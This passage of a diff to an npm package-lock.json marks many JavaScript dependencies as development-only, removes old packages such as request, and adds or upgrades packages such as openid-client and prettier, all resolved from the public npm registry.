true, "requires": { "p-locate": "^4.1.0" } @@ -6228,12 +6630,14 @@ "lodash.memoize": { "version": "4.1.2", "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==" + "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", + "dev": true }, "lru-cache": { "version": "5.1.1", "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", + "dev": true, "requires": { "yallist": "^3.0.2" } @@ -6242,6 +6646,7 @@ "version": "4.0.0", "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", + "dev": true, "requires": { "semver": "^7.5.3" }, @@ -6249,32 +6654,43 @@ "semver": { "version": "7.6.3", "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==" + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true } } }, "make-error": { "version": "1.3.6", "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==" + "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", + "dev": true }, "makeerror": { "version": "1.0.12", "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", + "dev": true, "requires": { "tmpl": "1.0.5" } }, + "math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", + "dev": true + }, "merge-stream": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==" + "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", + "dev": true }, "micromatch": { "version": "4.0.8", "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", + "dev": true, "requires": { "braces": "^3.0.3", "picomatch": "^2.3.1" @@ -6298,112 +6714,77 @@ "mimic-fn": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==" + "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", + "dev": true }, "minimatch": { "version": "3.1.2", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "minipass": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", - "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==", - "dev": true - }, - "minizlib": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", - "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", "dev": true, "requires": { - "minipass": "^3.0.0", - "yallist": "^4.0.0" - }, - "dependencies": { - "minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } + "brace-expansion": "^1.1.7" } }, - "mkdirp": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", - "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", - "dev": true - }, "ms": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true }, "natural-compare": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==" + "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", + "dev": true + }, + "node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "dev": true, + "requires": { + "whatwg-url": "^5.0.0" + } }, "node-int64": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==" + "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", + "dev": true }, "node-releases": { "version": "2.0.18", "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.18.tgz", - "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==" + "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==", + "dev": true }, "normalize-path": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==" + "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", + "dev": true }, "npm-run-path": { "version": "4.0.1", "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", + "dev": true, "requires": { "path-key": "^3.0.0" } }, - "oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", + "oauth4webapi": { + "version": "3.5.3", + "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.5.3.tgz", + "integrity": "sha512-2bnHosmBLAQpXNBLOvaJMyMkr4Yya5ohE5Q9jqyxiN+aa7GFCzvDN1RRRMrp0NkfqRR2MTaQNkcSUCCjILD9oQ==", "dev": true }, - "object-hash": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-2.2.0.tgz", - "integrity": "sha512-gScRMn0bS5fH+IuwyIFgnh9zBdo4DV+6GhygmWM9HyNJSgS0hScp1f5vjtm7oIIOiT9trXrShAkLFSc2IqKNgw==", - "dev": true, - "optional": true - }, - "oidc-token-hash": { - "version": "5.0.3", - "resolved": "https://registry.npmjs.org/oidc-token-hash/-/oidc-token-hash-5.0.3.tgz", - "integrity": "sha512-IF4PcGgzAr6XXSff26Sk/+P4KZFJVuHAJZj3wgO3vX2bMdNVp/QXTP3P7CEm9V1IdG8lDLY3HhiqpsE/nOwpPw==", - "dev": true, - "optional": true - }, "once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "dev": true, "requires": { "wrappy": "1" } @@ -6412,46 +6793,26 @@ "version": "5.1.2", "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", + "dev": true, "requires": { "mimic-fn": "^2.1.0" } }, "openid-client": { - "version": "5.4.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-5.4.3.tgz", - "integrity": "sha512-sVQOvjsT/sbSfYsQI/9liWQGVZH/Pp3rrtlGEwgk/bbHfrUDZ24DN57lAagIwFtuEu+FM9Ev7r85s8S/yPjimQ==", + "version": "6.6.1", + "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.6.1.tgz", + "integrity": "sha512-GmqoICGMI3IyFFjhvXxad8of4QWk2D0tm4vdJkldGm9nw7J3p1f7LPLWgGeFuKuw8HjDVe8Dd8QLGBe0NFvSSg==", "dev": true, - "optional": true, "requires": { - "jose": "^4.14.4", - "lru-cache": "^6.0.0", - "object-hash": "^2.2.0", - "oidc-token-hash": "^5.0.3" - }, - "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "optional": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true, - "optional": true - } + "jose": "^6.0.11", + "oauth4webapi": "^3.5.3" } }, "p-limit": { "version": "3.1.0", "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", + "dev": true, "requires": { "yocto-queue": "^0.1.0" } @@ -6460,6 +6821,7 @@ "version": "4.1.0", "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", + "dev": true, "requires": { "p-limit": "^2.2.0" }, @@ -6468,6 +6830,7 @@ "version": "2.3.0", "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dev": true, "requires": { "p-try": "^2.0.0" } @@ -6477,12 +6840,14 @@ "p-try": { "version": "2.2.0", "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==" + "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", + "dev": true }, "parse-json": { "version": "5.2.0", "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", + "dev": true, "requires": { "@babel/code-frame": "^7.0.0", "error-ex": "^1.3.1", @@ -6493,62 +6858,65 @@ "path-exists": { "version": "4.0.0", "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==" + "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", + "dev": true }, "path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==" + "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", + "dev": true }, "path-key": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==" + "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", + "dev": true }, "path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" - }, - "performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==", + "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", "dev": true }, "picocolors": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", - "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==" + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", + "dev": true }, "picomatch": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==" + "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", + "dev": true }, "pirates": { "version": "4.0.6", "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==" + "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", + "dev": true }, "pkg-dir": { "version": "4.2.0", "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", + "dev": true, "requires": { "find-up": "^4.0.0" } }, "prettier": { - "version": "3.4.2", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.4.2.tgz", - "integrity": "sha512-e9MewbtFo+Fevyuxn/4rrcDAaq0IYxPGLvObpQjiZBMAzB9IGmzlnG9RZy3FFas+eBMu2vA0CszMeduow5dIuQ==", + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.6.0.tgz", + "integrity": "sha512-ujSB9uXHJKzM/2GBuE0hBOUgC77CN3Bnpqa+g80bkv3T3A93wL/xlzDATHhnhkzifz/UE2SNOvmbTz5hSkDlHw==", "dev": true }, "pretty-format": { "version": "29.7.0", "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", + "dev": true, "requires": { "@jest/schemas": "^29.6.3", "ansi-styles": "^5.0.0", @@ -6558,7 +6926,8 @@ "ansi-styles": { "version": "5.2.0", "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==" + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", + "dev": true } } }, @@ -6566,89 +6935,45 @@ "version": "2.4.2", "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", + "dev": true, "requires": { "kleur": "^3.0.3", "sisteransi": "^1.0.5" } }, - "psl": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", - "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==", - "dev": true - }, - "punycode": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.0.tgz", - "integrity": "sha512-rRV+zQD8tVFys26lAGR9WUuS4iUAngJScM+ZRSKtvl5tKeZ2t5bvdNFdNHBW9FWR4guGHlgmsZ1G7BSm2wTbuA==", - "dev": true + "pump": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", + "integrity": "sha512-todwxLMY7/heScKmntwQG8CXVkWUOdYxIvY2s0VWAAMh/nd8SoYiRaKjlr7+iCs984f2P8zvrfWcDDYVb73NfA==", + "dev": true, + "requires": { + "end-of-stream": "^1.1.0", + "once": "^1.3.1" + } }, "pure-rand": { "version": "6.1.0", "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", - "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==" - }, - "qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", + "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", "dev": true }, "react-is": { "version": "18.2.0", "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==" - }, - "request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "dev": true, - "requires": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dev": true, - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - } - } + "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", + "dev": true }, "require-directory": { "version": "2.1.1", "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==" + "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", + "dev": true }, "resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", + "dev": true, "requires": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", @@ -6659,6 +6984,7 @@ "version": "3.0.0", "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", + "dev": true, "requires": { "resolve-from": "^5.0.0" } @@ -6666,12 +6992,14 @@ "resolve-from": { "version": "5.0.0", "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==" + "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", + "dev": true }, "resolve.exports": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==" + "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", + "dev": true }, "rfc4648": { "version": "1.5.2", @@ -6679,27 +7007,17 @@ "integrity": "sha512-tLOizhR6YGovrEBLatX1sdcuhoSCXddw3mqNVAcKxGJ+J0hFeJ+SjeWCv5UPA/WU3YzWPPuCVYgXBKZUPGpKtg==", "dev": true }, - "safe-buffer": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", - "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", - "dev": true - }, - "safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==", - "dev": true - }, "semver": { "version": "6.3.1", "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==" + "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "dev": true }, "shebang-command": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "dev": true, "requires": { "shebang-regex": "^3.0.0" } @@ -6707,32 +7025,65 @@ 